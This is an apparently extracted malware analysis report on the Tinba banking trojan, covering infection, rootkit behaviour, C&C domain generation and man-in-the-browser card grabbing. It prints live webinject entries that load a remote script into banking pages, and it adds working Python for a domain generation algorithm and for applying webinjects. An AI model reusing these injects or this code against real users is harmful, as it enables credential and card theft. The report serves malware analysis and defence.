Table of Contents 2 - f5.com


Table of Contents .......... 2
Table of Figures .......... 2
THE THREAT .......... 4
    Trojans .......... 4
    Script Injections .......... 4
SUMMARY OF THE ATTACK .......... 4
MALWARE ANALYSIS DETAILS .......... 6
    Dropper Infection .......... 6
    Hooking System Functions .......... 6
    Autorun Locations .......... 7
    Deployment on Disk .......... 7
    Hooking the Browsers and Lowering Security .......... 8
    Rootkit .......... 8
        Registry .......... 9
        Files .......... 9
    Communication with C&C .......... 10
    Downloading the Webinject Configuration File from the C&C .......... 11
    Posting Stolen Data To The Drop Zone .......... 12
    The Configuration File .......... 12
    Configuration File Structure .......... 14
    Tinba C&C Panel .......... 14
MAN IN THE BROWSER INJECTIONS .......... 15
    Specially Crafted Online Banking Injections .......... 15
    Generic VBV Grabber .......... 16
    CC+VBV Grabber .......... 17
        ATSEngine Panel .......... 19
        Stolen Credentials .......... 19
TINBA DETAILS AND DETECTION RATIO .......... 19
    Anti-Virus Scanning Results .......... 19
    About F5 Labs .......... 22


[Attack-flow diagram (page 5). Labels: User, Bank, Spam, Malware, Code Injection, Login Credentials, Drop Zone, Transfer, Botmaster.]

The user receives spam email and gets infected with Tinba malware. Tinba steals login credentials and injects malicious HTML/JavaScript code into the user's browser. The stolen information is sent to the C&C server. The attacker uses the stolen information for various fraudulent activities such as performing transactions and selling/using stolen credit cards.

[Pages 6-8: only the column headers of the process-activity tables survive extraction: Process Name, Process ID, Thread ID, Operation, Path, Detail. The table rows are not present.]


Registry

Files


Figure 5: The C:\Documents and Settings\Administrator\Application Data\557CEB7B\ folder as seen from IceSword.

The malware uses a hard-coded algorithm to generate pseudo-random domains to which it sends DNS queries. This gives the attackers the ability to bring up a new C&C server under one of the generated names if an old one has been taken down by Internet authorities. This way, the malware can come back to life without the need to infect the bots with a new binary.
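The domain-generation behaviour described above, as an added illustrative example that is neither Tinba's algorithm nor code from this report: a small date-seeded DGA, the bot-side walk over the day's candidate list, and the defender-side precomputation of a watchlist that can be matched against DNS logs or handed to a sinkhole. The seed, candidate count, TLD list, hash construction and DNS log line format are all assumptions made for the example.

```python
import hashlib
from datetime import date, timedelta
from typing import Iterable, List, Optional, Set, Tuple

# Seed, candidate count and TLD list are assumptions for this illustration,
# not values taken from Tinba.
SEED = b"example-seed"
TLDS = ("com", "net", "org")


def generate_domains(day: date, count: int = 5, seed: bytes = SEED) -> List[str]:
    """Derive `count` candidate C&C domains for one day from a hard-coded seed.

    Bot and botmaster run the same function; only the botmaster knows which
    candidate is actually registered for a given day.
    """
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + day.isoformat().encode() + i.to_bytes(4, "big")).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])  # 12 letters a-z
        domains.append(f"{label}.{TLDS[digest[12] % len(TLDS)]}")
    return domains


def resolve_c2(day: date, registered: Set[str]) -> Optional[str]:
    """Bot side: try the candidates in order and use the first one that resolves.
    The `registered` set stands in for the DNS lookups the bot would perform."""
    for candidate in generate_domains(day):
        if candidate in registered:
            return candidate
    return None


def precompute_watchlist(start: date, days: int, count: int = 5) -> Set[str]:
    """Defender side: once the algorithm and seed are recovered from the binary,
    enumerate every domain bots can query in a window, for sinkholing or log matching."""
    watch: Set[str] = set()
    for n in range(days):
        watch.update(generate_domains(start + timedelta(days=n), count))
    return watch


def find_dga_queries(log_lines: Iterable[str], watchlist: Set[str]) -> List[Tuple[str, str]]:
    """Return (client, qname) for DNS log lines whose queried name is on the watchlist.
    Assumed log line format: '<timestamp> <client-ip> <qname> <qtype>'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        client, qname = parts[1], parts[2].rstrip(".").lower()
        if qname in watchlist:
            hits.append((client, qname))
    return hits


# Constructed sample: one day's candidates and a DNS log in which two hosts query them.
TODAY = date(2014, 7, 1)
CANDIDATES = generate_domains(TODAY)
SAMPLE_LOG = [
    f"2014-07-01T10:00:01 10.0.0.5 {CANDIDATES[0]}. A",
    "2014-07-01T10:00:02 10.0.0.5 www.example.com. A",
    f"2014-07-01T10:00:03 10.0.0.9 {CANDIDATES[3]}. A",
    "2014-07-01T10:00:04 10.0.0.9 mail.example.com. A",
]

if __name__ == "__main__":
    print("today's candidates:", CANDIDATES)
    print("bot resolves:", resolve_c2(TODAY, {CANDIDATES[2]}))
    print("hits:", find_dga_queries(SAMPLE_LOG, precompute_watchlist(TODAY, 7)))
```

The takedown problem the paragraph describes is visible in `resolve_c2`: removing one registered domain only makes the bot continue down its candidate list, so the defensive options are the whole-window watchlist (sinkhole or block every candidate) or detection of the queries themselves, both of which depend on recovering the seed and algorithm from the sample.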


Webinject configuration entries (Generic VBV Grabber, page 16):

set_url *book* GP
data_before
data_end
data_inject
<script>
var myComputer = "%BOTID%";
</script>
<script src="https://omtorwa.com/vbvgr/src/x.js"></script>
data_end
data_after
</head>
data_end

set_url *pay* GP
data_before
data_end
data_inject
<script>
var myComputer = "%BOTID%";
</script>
<script src="https://omtorwa.com/vbvgr/src/x.js"></script>
data_end
data_after
</head>
data_end
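A parser for the webinject entry format shown above, added here as an example (not code from the report, from Tinba or from F5), applied to a constructed page. It reads the entries the way the Zeus-style format is conventionally interpreted, which is an assumption: set_url carries a shell-style wildcard URL pattern and request-method flags (G for GET, P for POST), data_before and data_after delimit where data_inject is placed (text between the two anchors is replaced, and an empty data_before means insert just before data_after), and %BOTID% is substituted with the bot's identifier. The script host in the sample config is a placeholder, not the URL from the report.

```python
import fnmatch
from typing import Dict, List, Optional

# Constructed sample config in the format shown above. The script host is a
# placeholder (an assumption for this example), not the URL from the report.
SAMPLE_CONFIG = """\
set_url *book* GP
data_before
data_end
data_inject
<script>
var myComputer = "%BOTID%";
</script>
<script src="https://payload.invalid/x.js"></script>
data_end
data_after
</head>
data_end
"""

# Constructed sample of a page the bank would serve on a matching URL.
SAMPLE_HTML = (
    '<html><head><title>Book</title></head>'
    '<body><form action="/book"><input name="card"></form></body></html>'
)

SECTIONS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text: str) -> List[Dict[str, str]]:
    """Split a config into entries: one dict per set_url with its three sections."""
    entries: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    section: Optional[str] = None
    buf: List[str] = []
    for line in text.splitlines():
        token = line.strip()
        if token.startswith("set_url"):
            parts = token.split()
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            entries.append(current)
        elif token in SECTIONS:
            section, buf = token, []
        elif token == "data_end":
            if current is not None and section is not None:
                current[section] = "\n".join(buf).strip()
            section = None
        elif section is not None:
            buf.append(line)
    return entries


def matches(entry: Dict[str, str], url: str, method: str) -> bool:
    """set_url is a shell-style wildcard; flags G/P select GET/POST (assumed meaning)."""
    flag = {"GET": "G", "POST": "P"}.get(method.upper())
    return flag is not None and flag in entry["flags"] and fnmatch.fnmatchcase(url, entry["url"])


def apply_inject(html: str, entry: Dict[str, str], bot_id: str) -> str:
    """Place data_inject between the data_before and data_after anchors.

    Assumed semantics: text between the two anchors is replaced by the inject;
    an empty anchor is simply not used, so the inject lands next to the other one.
    If an anchor is not found in the page the entry is skipped.
    """
    before, after = entry["data_before"], entry["data_after"]
    if not before and not after:
        return html
    start = end = None
    if before:
        i = html.find(before)
        if i < 0:
            return html
        start = i + len(before)
    if after:
        j = html.find(after, start or 0)
        if j < 0:
            return html
        end = j
    if start is None:
        start = end
    if end is None:
        end = start
    payload = entry["data_inject"].replace("%BOTID%", bot_id)
    return html[:start] + payload + html[end:]


def inject_page(html: str, url: str, method: str, entries: List[Dict[str, str]], bot_id: str) -> str:
    """Apply every entry whose set_url/flags match this request: the man-in-the-browser step."""
    for entry in entries:
        if matches(entry, url, method):
            html = apply_inject(html, entry, bot_id)
    return html


if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_CONFIG)
    print(inject_page(SAMPLE_HTML, "https://bank.example/book/login", "GET", rules, "BOT-42"))
```

Running the same entries over captured pages is also how a defender confirms what a recovered config would do to a given site: the injected page differs from the server's response only by the script block that loads the grabber and reports the bot identifier.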


ATSEngine Panel

Stolen Credentials
